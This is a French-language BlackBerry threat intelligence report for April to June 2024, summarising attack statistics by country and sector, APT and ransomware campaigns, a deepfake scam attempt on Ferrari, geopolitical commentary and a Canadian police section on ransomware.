Rapport mondial de veille sur les menaces

Édition de septembre 2024

Période de référence : 1er avril - 30 juin 2024

Des renseignements utiles qui comptent

Ce rapport fournit un examen complet du paysage mondial des menaces, en mettant l'accent sur la fourniture de renseignements exploitables que les clients peuvent utiliser pour sécuriser leurs organisations de manière proactive. Ce rapport couvre la période d'avril à juin 2024. Les points forts du rapport sont les suivants :

Les logiciels malveillants uniques et les attaques stoppées (tentatives d'attaques bloquées par les solutions de cybersécuritéBlackBerry®) sont en hausse de 53 % et 18 % respectivement par rapport à la période précédente. BlackBerry a noté une moyenne de plus de 11 500 hashs de logiciels malveillants uniques capturés chaque jour.

Pour plus d'informations, consultez la rubrique Attaques trimestrielles.

Au cours de ce trimestre, plus de 800 000 attaques ont été lancées contre des infrastructures critiques, dont 50 % visaient le secteur financier.

Découvrez les conclusions internes et externes de notre équipe de renseignement sur les cybermenaces (CTI) dans la section " Infrastructures critiques".

Les entreprises commerciales ont été fortement ciblées au cours de ce cycle, et parmi les attaques stoppées, 66 % visaient des sociétés qui fournissent des biens d'équipement.

Pour en savoir plus sur ces menaces, voir la section sur les entreprises commerciales.

La nouvelle section "Law Enforcement Limelight" apporte un nouvel aspect à ces rapports, avec les conclusions du Centre national de coordination de la cybercriminalité (NC3) du Canada.

En savoir plus sur l'épidémie de ransomware qui touche le Canada.

 

De nombreux groupes criminels très médiatisés (notamment des groupes de ransomware) ont été très actifs au cours de la période considérée. Ces groupes utilisent une série d'outils complexes pour atteindre leurs objectifs.

En savoir plus sur les acteurs de la menace et l'outillage.

Le paysage de la cybermenace est un maelström de groupes qui exploitent les dernières vulnérabilités et utilisent des familles de logiciels malveillants nouvelles ou mises à jour.

Consultez notre section sur les menaces prévalentes pour en savoir plus sur les menaces en cours dans les principaux systèmes d'exploitation.

Les voleurs d'informations malveillants (ou infostealers) sont une arme de premier plan utilisée par les acteurs de la menace pour exfiltrer des informations et des informations d'identification précieuses.

Lisez nos observations sur les outils d'exfiltration dans la section CylanceMDR Observations.

Notre analyse géopolitique examine comment l'augmentation des cybermenaces sophistiquées souligne la nécessité d'améliorer l'éducation à la cybersécurité.

Découvrez comment BlackBerry investit dans la cyberéducation dans son premier centre d'excellence en cybersécurité (CCoE) en Malaisie.

Table des matières

Le rapport BlackBerry® Global Threat Intelligence Report est publié régulièrement pour tenir les RSSI et autres décideurs clés informés des dernières menaces et défis en matière de cybersécurité qui affectent leur secteur d'activité et leur région géographique. En 2024, nous avons assisté à des troubles géopolitiques dans le monde entier sur diverses questions polarisantes. Cette situation a galvanisé les acteurs malveillants et les groupes de cybermenaces opportunistes qui tirent parti de l'agitation humaine pour en tirer profit, pour causer du tort ou simplement pour ajouter au chaos. Pour lutter contre ces menaces, BlackBerry fournit des services de cybersécurité essentiels à des organisations de toutes tailles et dans un large éventail d'industries à travers le monde.

Total des cyberattaques au cours de cette période

D'avril à juin 2024, les solutions de cybersécurité deBlackBerry ont stoppé 3,7 millions de cyberattaques. Cela représente plus de 43 500 cyberattaques stoppées par jour, soit une augmentation de 18 % par rapport à notre précédente période de reporting qui s'étendait de janvier à mars 2024.

En outre, nous avons observé une moyenne de 11 500 échantillons uniques de logiciels malveillants par jour ciblant notre base de clients, soit une augmentation de 53 % par rapport au dernier rapport. Il s'agit de l'une des plus fortes augmentations en pourcentage, d'un trimestre à l'autre, depuis que nous avons commencé à publier nos rapports de veille sur les menaces mondiales. Bien que la modification d'un hachage binaire ou la génération de charges utiles uniques ne soit pas complexe pour les acteurs aguerris de la menace, le volume inhabituellement élevé d'"attaques stoppées" et de "hachages uniques" est significatif. Il indique que les développeurs de logiciels malveillants mettent rapidement à jour et adaptent leur code pour accroître la résilience. Les chiffres bruts suggèrent que les nouveaux logiciels malveillants s'adaptent, que les familles de logiciels malveillants existantes gagnent en capacités et que les adversaires emploient rapidement des tactiques plus avancées. Il en résulte des logiciels malveillants plus puissants grâce à l'amélioration des techniques d'obscurcissement, de sophistication et d'évasion.

BlackBerry surveille et identifie activement les modifications apportées aux familles de logiciels malveillants, car les développeurs cybercriminels s'efforcent de contourner les systèmes de cybersécurité. Dans ce rapport, vous découvrirez les dernières conclusions de notre équipe de recherche et de renseignement sur les menaces, vous apprendrez quels groupes utilisent actuellement chaque type de logiciel malveillant et vous passerez en revue nos recommandations en matière de cyberdéfense stratégique contre ces types de menaces.

Comme vous le remarquerez, le nombre total d'attaques n'est pas nécessairement en corrélation avec le nombre de hachages uniques (nouveaux logiciels malveillants). Comme l'illustrent les figures 2 à 9 dans les sections suivantes, toutes les cyberattaques n'utilisent pas des logiciels malveillants uniques. Cela dépend de la motivation de l'attaquant, de la complexité de l'attaque et de son objectif global - par exemple, l'espionnage, le gain financier ou le fait de causer un préjudice général à la cible.

Figure 1 : Hachures uniques de logiciels malveillants rencontrées par minute, de mars 2023 à juin 2024.
(*Ce rapport couvre un cycle de 120 jours. Les autres rapports couvrent des cycles d'environ 90 jours).

Total des cyberattaques par pays

Attaques stoppées

Les organisations utilisant les solutions BlackBerry aux États-Unis ont reçu le plus grand nombre de tentatives d'attaques au cours de ce cycle. En dehors des États-Unis, la Corée du Sud, le Japon, l'Australie et la Nouvelle-Zélande ont également connu un niveau élevé d'attaques, ce qui leur a valu de figurer dans notre top 5 et de faire de l'Asie-Pacifique (APAC) la deuxième région la plus ciblée.

Dans la région APAC, où l'engagement de BlackBerry s'intensifie, les tensions géopolitiques continuent d'influencer les tendances cybernétiques. Les cyberattaques parrainées ou non par des États contre les infrastructures critiques, les chaînes d'approvisionnement et les entreprises se multiplient. Les organisations sont de plus en plus ciblées par une pléthore de menaces telles que le cyberespionnage, les écoutes, les ransomwares et les attaques par hameçonnage. Pour renforcer la résilience de leurs chaînes d'approvisionnement et de leurs organisations, elles doivent faire preuve de prudence et redoubler de vigilance pour protéger leurs infrastructures, leurs données, leurs appareils et leurs communications.

La figure 2 montre les cinq pays dans lesquels les solutions de cybersécurité de BlackBerry ont arrêté le plus grand nombre de cyberattaques et qui ont reçu la majorité des binaires malveillants.

Figure 2 : Nations classées en fonction du nombre d'attaques stoppées et du nombre de hachages uniques, d'avril à juin 2024.

Malware unique

Comme indiqué dans la section Cyberattaques totales au cours de cette période, BlackBerry a observé une moyenne de 11 500 nouveaux hashs (logiciels malveillants uniques) par jour ciblant notre base de clients, soit une augmentation de 53 % par rapport au rapport précédent. Il s'agit de l'une des plus fortes augmentations en pourcentage d'un trimestre à l'autre que nous ayons observées depuis le début de nos rapports récurrents. De nombreux facteurs contribuent à cette augmentation des logiciels malveillants uniques. L'un d'entre eux est l'augmentation des attaques ciblées à un niveau macro - comme le ciblage d'une liste entière de courriels d'employés avec des courriels d'hameçonnage ciblés et des leurres spécifiques à l'entreprise - dans l'espoir que plusieurs employés soient trompés.

Comme le montre la figure 2, les États-Unis, le Japon, la Corée du Sud et l'Australie sont toujours en tête de liste, comme ils l'étaient dans le rapport de la période précédente. Comme le montre la figure 2, les États-Unis, le Japon, la Corée du Sud et l'Australie sont toujours en tête de liste, comme ils l'étaient dans le rapport de la période précédente. En outre, le Canada est désormais le cinquième plus grand destinataire de logiciels malveillants uniques.

Comparaison des résultats

Comme le montre la comparaison des résultats de cette période avec ceux du dernier rapport, les quatre premiers pays pour les attaques stoppées et les hashs uniques de logiciels malveillants rencontrés sont restés relativement inchangés. Cependant, le Japon a supplanté ses voisins de l'APAC pour le nombre de hashs malveillants rencontrés par nos clients dans ce pays. Les locataires de la Nouvelle-Zélande ont subi le cinquième plus grand volume d'attaques, et le Canada a dépassé le Brésil pour entrer dans notre liste des cinq premiers pays ciblés par des hachages uniques. Comme le montre la figure 2, les États-Unis, le Japon, la Corée du Sud et l'Australie sont toujours en tête de liste, comme ils l'étaient dans le rapport de la période précédente. Comme le montre la figure 2, les États-Unis, le Japon, la Corée du Sud et l'Australie sont toujours en tête de liste, comme ils l'étaient dans le rapport de la période précédente. En outre, le Canada est désormais le cinquième plus grand destinataire de logiciels malveillants uniques.
Figure 3 : Évolution du classement des attaques totales stoppées et des hachages uniques, dans le présent rapport (avril - juin 2024) par rapport au rapport précédent (janvier - mars 2024).

Cyber Story Highlight : Espionnage dans l'APAC

Transparent Tribe cible le gouvernement indien et les secteurs de la défense et de l'aérospatiale en s'appuyant sur des langages de programmation multiplateformes.

Dans leurs derniers efforts, les chercheurs de BlackBerry ont identifié Transparent Tribe, un groupe pakistanais de menaces persistantes avancées (APT), qui cible le gouvernement indien et les secteurs de la défense et de l'aérospatiale. Connu pour ses activités de cyberespionnage depuis 2013, le groupe utilise des langages multiplateformes tels que Python et Golang, et abuse de services web tels que Telegram et Discord. Parmi les campagnes récentes, on peut citer des courriels de spearphishing destinés à des acteurs clés du secteur aérospatial à Bengaluru (anciennement Bangalore), en Inde. Malgré les tentatives de dissimulation de leurs origines, les tactiques et les outils de Transparent Tribe les désignent. 

Cyberattaques par secteur d'activité

BlackBerry a regroupé ses secteurs d'activité en deux grandes catégories : les infrastructures critiques et les entreprises commerciales. BlackBerryLes données télémétriques et les statistiques sur les infrastructures critiques proviennent de clients appartenant aux 16 secteurs définis par l'Agence pour la cybersécurité et la sécurité des infrastructures (CISA) comme des infrastructures critiques. Ces secteurs comprennent la santé, l'administration, l'énergie, l'agriculture, la finance et la défense. Les entités commerciales au sein des entreprises commerciales s'engagent dans la production, la distribution ou la vente de biens et de services. Ces entreprises opèrent dans divers secteurs tels que la fabrication, la vente au détail et les services.

Figure 4 : Attaques stoppées et hachages uniques par secteur d'activité d'avril à juin 2024.

Infrastructures critiques

Les infrastructures critiques sont une cible lucrative pour les cybercriminels. Ces données ont souvent une grande valeur et peuvent être revendues à d'autres groupes de menace, utilisées pour planifier des attaques ou même à des fins d'espionnage. Les acteurs de la menace qui ciblent les infrastructures critiques peuvent avoir recours à des ransomwares dans leurs attaques parce que l'organisation peut préférer payer la rançon plutôt que de prendre le temps d'essayer de restaurer les données à partir des sauvegardes. Le temps est un facteur essentiel pour les organisations qui fournissent des services critiques tels que les soins de santé, et les acteurs de la menace le savent très bien.

Cette année, les turbulences géopolitiques ont placé les infrastructures critiques dans la ligne de mire d'adversaires opposés aux politiques des nations dans lesquelles elles résident ou avec lesquelles elles collaborent. Cette situation incite souvent les groupes de menace et les États commanditaires à cibler spécifiquement les infrastructures critiques.

La numérisation croissante des infrastructures critiques a rendu le secteur encore plus vulnérable aux cybercriminels ces dernières années. Les acteurs de la menace exploitent activement les systèmes critiques en s'attaquant aux vulnérabilités telles que les mauvaises configurations des systèmes et les systèmes anciens non corrigés, ou en tentant d'infiltrer les systèmes par le biais de campagnes d'ingénierie sociale menées auprès des employés.

Au cours de la période allant d'avril à juin 2024, CylanceENDPOINT™ et d'autres solutions de cybersécurité BlackBerry ont arrêté plus de 800 000 attaques contre des organisations dans les secteurs industriels des infrastructures critiques. Près de la moitié de ces attaques étaient dirigées contre des entreprises du secteur financier - une augmentation de 10 % par rapport à la dernière période - tandis que les organisations gouvernementales et du secteur public ont connu la plus grande diversité d'attaques, attirant plus de 45 % des hachages uniques.

En outre, près de la moitié (49 %) des hachages uniques de logiciels malveillants ciblaient des organisations d'infrastructures critiques, soit une augmentation de 17 % par rapport à la période précédente, tandis que 41 % des cyberattaques sectorielles rencontrées par les solutions de cybersécurité de BlackBerry visaient des infrastructures critiques.

Figure 5 : Attaques contre les infrastructures critiques stoppées et logiciels malveillants uniques par secteur, d'avril à juin 2024.
Figure 6 : Menaces internes les plus fréquentes pour les infrastructures critiques ce trimestre.

Cyber Story Highlight : Menaces contre les infrastructures critiques

SideWinder utilise une nouvelle infrastructure de distribution pour cibler les ports et les installations maritimes de la mer Méditerranée

En juillet 2024, l'équipe de recherche et de renseignement sur les menaces de BlackBerry a découvert une nouvelle campagne du groupe de menace connu sous le nom de SideWinder. Également connu sous les noms de Razor Tiger, Rattlesnake et T-APT-04, le groupe SideWinder est actif depuis au moins 2012. Le groupe a déjà été observé en train de cibler des entités militaires, gouvernementales et commerciales, avec un accent particulier sur le Pakistan, l'Afghanistan, la Chine et le Népal. SideWinder utilise généralement des techniques de spearphishing par courriel, d'exploitation de documents et de chargement latéral de DLL pour éviter la détection et livrer des implants ciblés.

Dans le cadre de cette campagne, BlackBerry a observé trois documents falsifiés de type "appât visuel" associés à des infrastructures portuaires très spécifiques. Les leurres visuels ne sont généralement pas malveillants en eux-mêmes ; leur principal objectif est de détourner l'attention de la victime pour qu'elle ne se rende pas compte qu'elle est compromise. La victime est généralement un employé d'une entreprise cible. Voici un exemple tiré de la dernière campagne de SideWinder :

Figure 7 : Document d'appât visuel utilisé par SideWinder dans sa dernière campagne.
Figure 7 : Document d'appât visuel utilisé par SideWinder dans sa dernière campagne.

Les acteurs de la menace utilisent toute une série d'astuces pour inciter la victime à ouvrir et à lire le document-appât visuel :

  • Le pirate copie le logo réel d'une organisation légitime que le destinataire est susceptible de connaître en raison de son travail ou de son secteur d'activité. Dans la figure 7 ci-dessus, l'appât visuel utilise abusivement le logo de l'autorité portuaire (légitime) de la mer Rouge en Égypte.
  • Les titres des documents sont conçus pour susciter un maximum d'inquiétude chez le destinataire. L'en-tête de notre exemple ci-dessus ("AVIS DE CESSATION D'EMPLOI ET DE RÉDUCTION DE SALAIRE") a pour but de faire craindre à l'employé pour la sécurité de son emploi et de ses finances.
  • Dans l'exemple ci-dessus, notez les phrases chargées d'émotion telles que "a épuisé la plupart de nos réserves financières", "grave préoccupation" et "mettre fin à l'emploi" dans le corps du document. Ces phrases sont présentées en gras afin qu'elles sautent immédiatement aux yeux du lecteur.

Les acteurs de la menace espèrent qu'en utilisant des logos d'entreprises familières et en suscitant des émotions fortes telles que la peur ou l'inquiétude pour la sécurité de l'emploi, la victime croira que le document est légitime et sera obligée de le lire dans un état d'anxiété élevé. Elle sera alors tellement distraite qu'elle ne remarquera pas les événements étranges qui se produisent sur son appareil, tels que les fenêtres contextuelles du système ou l'augmentation du bruit du ventilateur causée par une utilisation élevée du processeur, qui est souvent un signe avant-coureur d'une infection par un logiciel malveillant en cours.

L'analyse des données recueillies au cours de nos recherches nous a permis de conclure, avec un degré de confiance moyen, que la nouvelle campagne de SideWinder vise les ports et les installations maritimes de l'océan Indien et de la mer Méditerranée. Sur la base des campagnes précédentes de SideWinder, nous pensons que l'objectif de cette nouvelle campagne est l'espionnage et la collecte de renseignements. Lisez l'article complet sur le blogBlackBerry .

Infrastructures critiques : Menaces externes

BlackBerry suit également de près les menaces extérieures, c'est-à-dire les menaces signalées par des organisations extérieures et qui ne figurent pas nécessairement sur le site BlackBerry. Tout au long de cette période, des groupes externes - agences gouvernementales, organisations de presse industrielles et autres - ont signalé de nombreuses attaques contre des infrastructures critiques dans le monde entier.

Au cours des derniers jours de mars, on a appris que plusieurs agences gouvernementales indiennes et entités du secteur de l'énergie avaient été infectées par une variante personnalisée du voleur d'informations disponible gratuitement, HackBrowserData. Utilisant des courriels de phishing comme vecteur d'infection et des canaux Slack comme canal d'exfiltration, l'acteur inconnu de la menace a volé 8,8 Go de données sensibles, y compris des détails sur les employés et des dossiers financiers.

En avril, Frontier Communications, une entreprise de télécommunications basée au Texas, a signalé à la Securities and Exchange Commission (SEC) des États-Unis qu'elle avait détecté une faille le 14 avril et qu'elle avait dû arrêter certains de ses systèmes pour s'en remettre. L'acteur inconnu de la menace a pu accéder à des données sensibles, y compris des informations personnelles identifiables.

Toujours en avril, le CERT-UA (Ukrainian Computer Emergency Response Team) a fait état d'un projet du groupe Sandworm, prétendument parrainé par la Russie, d'attaquer diverses infrastructures critiques dans ce pays déchiré par la guerre. Le complot visait une vingtaine d'entités dans divers secteurs d'infrastructures critiques, dont l'eau et l'énergie. La longue série d'attaques de Sandworm contre les infrastructures critiques de l'Ukraine devrait se poursuivre au fur et à mesure que la guerre entre la Russie et l'Ukraine se prolonge.

La première semaine de mai a été marquée par un avis commun de plusieurs agences américaines, en collaboration avec le National Cyber Security Centre du Royaume-Uni et le Centre canadien de cybersécurité (CCCS), concernant une menace permanente de piratage informatique de la part d'éléments pro-russes. Les hacktivistes ont ciblé les infrastructures critiques connectées à l'internet, notamment l'eau, l'énergie, les barrages et l'agriculture. Leurs efforts se sont concentrés sur les systèmes de technologie opérationnelle (OT) connectés à Internet dans les secteurs d'infrastructures critiques en Europe et en Amérique du Nord.

Au début du mois de mai, les opérateurs du ransomware BlackBasta ont pris pour cible un grand prestataire de soins de santé catholique à but non lucratif qui compte environ 140 hôpitaux dans 18 États des États-Unis. Puis, début juin, BlackBasta a dérobé 550 Go de données à la société de biotechnologie Elutia, basée dans le Maryland. Les données comprenaient des informations sur les employés et des informations financières.

BlackBasta n'était pas le seul gang de ransomware à cibler le secteur de la santé. Fin juin, le groupe de ransomwares BlackSuit s'est introduit dans le National Health Laboratory Service (NHLS) d'Afrique du Sud et dans ses 265 laboratoires. BlackSuit serait un dérivé de l'agressif et dangereux ransomware Conti. L'intrusion de BlackSuit a coïncidé avec une épidémie de monkeypox (mpox) et a eu un impact significatif sur les systèmes du NHLS. L'auteur de la menace a supprimé des parties des systèmes du NHLS, y compris des sauvegardes, bien qu'aucune donnée sensible sur les patients n'ait été perdue.

Ces attaques et d'autres au cours du dernier trimestre indiquent que les opérateurs de ransomware ciblant les infrastructures critiques, en particulier le secteur des soins de santé, restent un problème persistant.

Entreprise commerciale

Les menaces internes contre les entreprises commerciales ont également augmenté de manière significative au cours de cette période. Le nombre d'attaques stoppées par BlackBerry cybersecurity (1,1 million d'attaques) a augmenté de 60 % par rapport au dernier rapport.

Dans le secteur des entreprises commerciales, nous avons observé une augmentation significative des attaques contre le secteur des biens d'équipement. Contrairement aux biens de consommation, les biens d'équipement comprennent les machines, les outils et les équipements essentiels pour diverses industries dans l'ensemble des entreprises commerciales et des infrastructures critiques. Le ciblage de ces actifs peut avoir un impact sur les chaînes d'approvisionnement numériques et physiques d'une entreprise.

Figure 8 : Attaques stoppées et logiciels malveillants uniques liés aux entreprises commerciales, par secteur, d'avril à juin 2024.
Figure 9 : Principales menaces internes contre les entreprises commerciales d'avril à juin 2024.

Entreprise commerciale : Menaces externes

Au début du mois d'avril, IxMetro PowerHost a été victime d'une cyberattaque menée par le gang de ransomware SEXi, relativement nouveau, qui aurait utilisé une fuite du code source de LockBit 3.0. Le groupe a ciblé les serveurs VMware ESXi et les sauvegardes de l'organisation, ce qui a entraîné une perturbation importante des services d'IxMetro PowerHost au Chili.

En avril également, la plateforme d'achat chinoise Pandabuy a été victime d'une intrusion et les données de plus de 1,3 million de clients ont été divulguées en ligne. Pandabuy permet aux utilisateurs d'acheter des produits sur d'autres plateformes de commerce électronique chinoises. Un acteur de la menace connu sous le nom de Sanggiero a revendiqué l'attaque, déclarant qu'il avait exploité des vulnérabilités critiques du serveur dans l'API de la plateforme et d'autres exploits pour accéder aux services internes du détaillant. Le détaillant en ligne est soupçonné d'avoir initialement payé une somme pour empêcher la fuite de données. Toutefois, en juin 2024, le même acteur de la menace a affirmé avoir exploité et extorqué à nouveau la plateforme basée en Chine.

Au début du mois de mai, une grande entreprise technologique multinationale a alerté ses clients d'une violation de données à grande échelle touchant près de 50 millions de personnes. Bien que l'entreprise technologique ait confirmé qu'aucune information financière n'avait été compromise, d'autres informations personnelles identifiables (IPI) ont été exposées, notamment les noms et les adresses physiques des clients. Malgré cela, l'entreprise technologique a publiquement minimisé l'impact potentiel de la violation en raison de la nature non financière des données volées.

L'une des plus importantes violations de données de l'année s'est produite en mai, lorsque le groupe de menace ShinyHunters s'est introduit dans une société multinationale de vente et de distribution de billets de spectacles et a volé les données de plus de 560 millions de clients. Les données comprenaient des informations personnelles telles que des noms, des adresses et des courriels, ainsi que des données de cartes de crédit hachées. Les utilisateurs concernés ont été avertis par courrier.

En juin, une multinationale américaine spécialisée dans les logiciels a subi une panne de grande ampleur à la suite d'une attaque par ransomware, qui a eu des répercussions sur les activités de milliers de concessionnaires automobiles en Amérique du Nord. L'interruption a touché toutes les facettes des activités des concessionnaires, y compris la vente et la réparation de voitures, sur plus de 15 000 sites. Le groupe de ransomware BlackSuit a revendiqué la responsabilité de l'attaque, exigeant une rançon de près de 25 millions de dollars américains en crypto-monnaie. L'organisation aurait payé la rançon pour restaurer ses systèmes.

Fin juin, TeamViewer, société de services logiciels basée en Amérique du Nord, a confirmé que le groupe APT prolifique Cozy Bear (alias APT29) avait attaqué les systèmes informatiques de l'entreprise. Cozy Bear est un groupe de pirates informatiques basé en Russie qui serait affilié au service de renseignement extérieur russe. Le groupe a commis de nombreuses attaques et exploits au fil des ans, y compris la faille SolarWinds de 2020. TeamViewer a publié une déclaration affirmant que seules les données des comptes des employés ont été compromises et que rien ne prouve que Cozy Bear ait accédé aux environnements de production ou aux données des clients.

Cyber Story Highlight : Les Deepfakes contre les entreprises commerciales

Vigilance des employés : La première ligne de défense contre les escroqueries Deepfake

Les photos, les vidéos et les sons "à voix profonde" (deepfake) posent un problème de plus en plus important en matière de cybersécurité. Les deepfakes sont des médias manipulés numériquement et créés à l'aide de l'intelligence artificielle générative (IA), le cas d'utilisation le plus courant étant le "faceswap", c'est-à-dire la superposition numérique du visage d'une personne sur celui d'une autre. Les deepfakes sont souvent très réalistes et convaincants et peuvent être utilisés par des acteurs malveillants dans le cadre d'un large éventail d'attaques, notamment des escroqueries par hameçonnage, de faux appels téléphoniques et même de faux appels vidéo destinés à faire croire au destinataire qu'il reçoit une demande légitime d'un autre employé, comme son patron.

Depuis que la première application permettant de créer des deepfakes a été lancée par un utilisateur de Reddit fin 2017, les deepfakes ont évolué à une vitesse fulgurante pour devenir d'une efficacité redoutable en incitant les employés à fournir aux attaquants des identifiants de connexion, des dossiers financiers ou de clients, voire à virer des millions de dollars de fonds de l'entreprise à un escroc.

Lors d'un incident récent, le constructeur automobile Ferrari a échappé à une coûteuse escroquerie de type deepfake. Un cadre a reçu un appel suspect d'une personne se faisant passer pour le PDG, Benedetto Vigna. L'accent et le ton de l'escroc étaient presque identiques à ceux du véritable PDG, mais le cadre a remarqué des signaux d'alarme tels que l'utilisation d'un numéro de téléphone inconnu et le caractère prétendument urgent des messages.

Pour vérifier l'identité de l'appelant, le cadre a posé une question spécifique sur une recommandation de livre - un détail que seul le véritable PDG connaîtrait. Lorsque l'escroc n'a pas pu répondre, ils ont raccroché. La rapidité d'esprit du cadre a permis d'éviter un désastre potentiel et a incité Ferrari à lancer une enquête interne pour garantir la sécurité de ses communications.

Cet incident met en lumière le rôle important que jouent les employés dans la protection de leur entreprise contre la fraude. L'ingénierie sociale est un élément essentiel de presque toutes les attaques de type "deepfake" ; l'auteur de la menace part du principe que l'employé est le maillon faible du périmètre de sécurité de l'entreprise et utilise des techniques de manipulation psychologique pour gagner la confiance de sa cible. Félicitations aux employés qui restent vigilants et sceptiques face à des demandes inhabituelles, en particulier celles qui impliquent le transfert d'argent ou d'informations sensibles. Leur prise de conscience et leur rapidité d'action peuvent éviter à une entreprise d'importantes pertes financières et une atteinte à sa réputation. 

Les entreprises peuvent améliorer leur sécurité en sensibilisant leurs employés aux signaux d'alarme qui indiquent qu'un escroc peut être à l'origine d'un "faux" appel téléphonique ou vidéo, d'un courriel ou d'un texte. Vous pouvez commencer par célébrer et soutenir ces héros méconnus qui protègent chaque jour votre organisation contre des menaces sophistiquées. Partagez cette anecdote avec vos collègues. Rappelez-leur que s'ils soupçonnent que quelque chose ne va pas, ils doivent se fier à leur instinct et trouver un autre moyen de vérifier l'identité de l'auteur de la demande.

Pour en savoir plus sur les deepfakes, lisez notre livre blanc, Deepfakes Unmasked : La technologie et les techniques à l'origine de cette menace croissante.

Analyse géopolitique et commentaires

Les gouvernements du monde entier sont de plus en plus conscients du fait que la technologie est une force motrice dans les rivalités géopolitiques. Dans le discours qu'il a prononcé lors de la conférence RSA à San Francisco (Californie) le 6 mai 2024, le secrétaire d'État américain Antony J. Blinken a décrit un monde aux portes d'une compétition à somme nulle dans laquelle les pays seraient contraints d'adopter des piles technologiques occidentales ou chinoises. L'ambassadeur du secrétaire Blinken pour le cyberespace et la politique numérique, Nathaniel C. Fick, a été encore plus précis lorsqu'il a déclaré que "l'ordre international sera défini par le système d'exploitation métaphorique qui dominera".

Le rythme sans précédent auquel évoluent les technologies telles que l'IA générative a donné lieu à un foisonnement d'activités appelant à une utilisation "responsable" des technologies numériques avancées. Si les technologies telles que l'IA ont un potentiel considérable pour stimuler la croissance économique, transformer les sociétés et s'attaquer à certains des problèmes mondiaux les plus difficiles à résoudre (par exemple, le changement climatique, les inégalités et les maladies), elles présentent également des risques qui peuvent avoir un impact important, en particulier si ces risques se manifestent dans des infrastructures ou des services essentiels dont les gens dépendent au quotidien.

Comme le souligne le présent rapport, les cybercriminels, y compris les groupes parrainés par des États, ciblent de plus en plus les infrastructures critiques. Les cas d'intentions malveillantes ou criminelles visant à perturber les services ou à demander une rançon aux exploitants et aux propriétaires d'infrastructures critiques sont montés en flèche au niveau mondial au cours des dernières années. Au cours de la période considérée, le site BlackBerry a recensé plus de 800 000 attaques contre des infrastructures critiques, dont 50 % visaient le secteur financier. Les auteurs sont conscients de la criticité de ces services et cherchent à maximiser leurs efforts pour obtenir une rançon en cherchant à provoquer, ou en menaçant de provoquer, une perturbation maximale de ces services.

Les grands événements sportifs internationaux, tels que les Jeux olympiques et la Coupe du monde de la FIFA, sont également devenus la cible de cybermenaces. En prévision d'une augmentation spectaculaire des activités cybernétiques malveillantes, le Centre canadien de cybersécurité a publié un bulletin sur les cybermenaces en mai 2024, estimant que "les cybercriminels cibleront très probablement les grandes organisations associées aux grands événements sportifs internationaux et les entreprises locales situées à proximité des grands événements sportifs en compromettant les courriels professionnels et en lançant des attaques par ransomware". Il a également mis en garde les participants et les spectateurs contre les courriels d'hameçonnage et les sites web malveillants qui utilisent ces événements comme appâts pour des attaques.

En effet, après la fin des Jeux olympiques, les autorités françaises ont signalé plus de 140 cyberattaques liées aux Jeux olympiques de 2024, toutes qualifiées de "faible impact". Toutefois, au vu des tendances observées lors des Jeux olympiques précédents, ce chiffre est probablement largement sous-estimé. Par exemple, lors des Jeux olympiques de Tokyo en 2021, les organisateurs ont fait état de 450 millions de cyberattaques.

Comme l'a noté le Forum économique mondial (WEF) dans son rapport Global Cybersecurity Outlook 2024, les gouvernements et les entreprises ont du mal à maintenir leur cyber-résilience face à des cyber-menaces de plus en plus sophistiquées et qui s'intensifient rapidement, et qui pourraient causer des perturbations massives. En outre, la capacité des organisations à se protéger est très variable. Selon le WEF, alors que 85 % des organisations comptant 100 000 employés ou plus ont une cyber-assurance, moins de 21 % des organisations comptant moins de 250 employés ont une cyber-assurance. En somme, les plus petites organisations sont plus de "deux fois plus susceptibles que les plus grandes de déclarer qu'elles n'ont pas la cyber-résilience dont elles ont besoin pour répondre à leurs exigences opérationnelles critiques minimales". Ce déséquilibre entre les grandes et les petites organisations doit être corrigé.

L'application de la loi sous les feux de la rampe

À partir de ce Global Threat Intelligence Report, BlackBerry collabore avec le Centre national de coordination de la cybercriminalité (NC3) de la Gendarmerie royale du Canada afin de mettre en évidence les principales informations fournies par les services de police sur les tendances en matière de cybercriminalité. Ce n'est qu'un exemple de la façon dont BlackBerry collabore avec les services de police du monde entier pour améliorer la collaboration entre les secteurs public et privé en matière de cybersécurité.
L'application de la loi sous les feux de la rampe
La cybercriminalité est reconnue comme une menace majeure à l'échelle mondiale et présente des défis uniques pour les forces de l'ordre. Contrairement aux délits commis dans le monde physique, la cybercriminalité ne connaît souvent pas de frontières, les auteurs, les victimes et les infrastructures relevant généralement de juridictions différentes, y compris au niveau international. En l'absence d'une force de police mondiale, il est nécessaire que les services répressifs du monde entier élaborent des processus de coordination des réponses à la cybercriminalité et s'engagent dans une collaboration internationale.

Renforcer les capacités des forces de l'ordre : Le soutien spécialisé du NC3

Le Centre national de coordination de la lutte contre la cybercriminalité (NC3) a été créé en 2020 en réponse à la Stratégie nationale de cybersécurité du Canada de 2018. Sous la direction de la Gendarmerie royale du Canada, ce service de police national a pour mandat d'aider à réduire la menace, l'impact et la victimisation causés par la cybercriminalité au Canada. Il fournit un soutien spécialisé à tous les services de police canadiens et emploie à la fois des policiers et des civils dotés de compétences diverses pour fournir l'expertise technique et d'enquête nécessaire à l'analyse efficace des délits sophistiqués. Le NC3 fournit des services spécialisés pour soutenir les partenaires de l'application de la loi, tels que :

  • Renseignements sur la cybercriminalité
  • Avis et conseils techniques
  • Développement d'outils
  • Analyse comportementale
  • Traçage des crypto-monnaies

Le NC3 travaille en étroite collaboration avec les services de police nationaux et internationaux, les partenaires gouvernementaux, le secteur privé et le monde universitaire afin d'améliorer en permanence la réponse des services de police canadiens à la cybercriminalité.

La prévalence des rançongiciels

Ayant accès aux données sur la cybercriminalité au niveau national, le NC3 évalue régulièrement les nouvelles tendances de la cybercriminalité afin d'informer les priorités d'enquête et de mieux comprendre l'écosystème de la cybercriminalité. Le NC3 utilise des rapports de sources ouvertes pour compléter le tableau. Les rançongiciels sont considérés comme la principale menace cybercriminelle au Canada, puisque près de 60 % des incidents signalés au NC3 sont des attaques par rançongiciel. Aucune organisation n'est à l'abri, car les opérateurs de ransomware ciblent tous les secteurs et toutes les organisations, bien que les petites et moyennes entreprises (PME) soient une cible particulièrement attrayante au Canada.

Principales menaces de ransomware au Canada

Le NC3 effectue des évaluations régulières pour identifier les principales menaces de ransomware au Canada. L'évaluation la plus récente a porté sur les incidents survenus entre le 1er janvier 2024 et le 30 avril 2024. La figure ci-dessous présente les dix principales menaces de ransomware pour cette période.

Malgré la prévalence des ransomwares, la plupart des actes de cybercriminalité ne sont pas signalés. On estime qu'environ 10 % seulement de la cybercriminalité est signalée aux services de police canadiens. Il est donc difficile de comprendre pleinement la prévalence et l'impact de la cybercriminalité dans ce pays.

Figure 10 : Principales découvertes de ransomware du NC3 affectant le Canada, de janvier à avril 2024.

